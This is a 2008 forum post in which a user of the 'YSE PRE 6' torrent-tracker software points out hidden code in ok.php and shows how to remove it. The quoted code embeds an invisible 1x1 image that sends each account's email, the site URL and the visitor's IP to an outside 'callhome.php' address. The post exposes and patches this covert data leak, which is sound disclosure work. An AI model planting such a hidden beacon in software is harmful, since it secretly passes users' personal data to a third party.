View Single Post
  #1  
Old 30th November 2008, 20:48
kp380lv's Avatar
kp380lv kp380lv is offline
Senior Member
 
Join Date: May 2008
Latvia
Posts: 388
Exclamation Why need this function in YSE PRE 6!??
Wtf?Yuna gets my tracker account data?

PHP Code:
    else
        print(
"<p>Your account has been activated! However, it appears that you could not be logged in automatically. A possible reason is that you disabled cookies in your browser. You have to enable cookies to use your account. Please do that and then <a href=\"login.php\">log in</a> and try again.</p>\n");
    
mkglobal('email');
    echo 
'<img src="http://bit-torrent.kiev.ua/callhome.php?email='.$email.'&amp;url='.urlencode($DEFAULTBASEURL).'&amp;ip='.getip().'" alt="" title="" border="0" width="1" height="1" />';
    
stdfoot();
    } 
My info sends to http://bit-torrent.kiev.ua/callhome.php! I don't understand this :D

Anyway i fix this problem:D Replace old function with this:) Open ok.php and replace top code with this bottom code

PHP Code:
    else
        print(
"<p>Your account has been activated! However, it appears that you could not be logged in automatically. A possible reason is that you disabled cookies in your browser. You have to enable cookies to use your account. Please do that and then <a href=\"login.php\">log in</a> and try again.</p>\n");
    
stdfoot();
    } 

Last edited by kp380lv; 30th November 2008 at 22:10.
Reply With Quote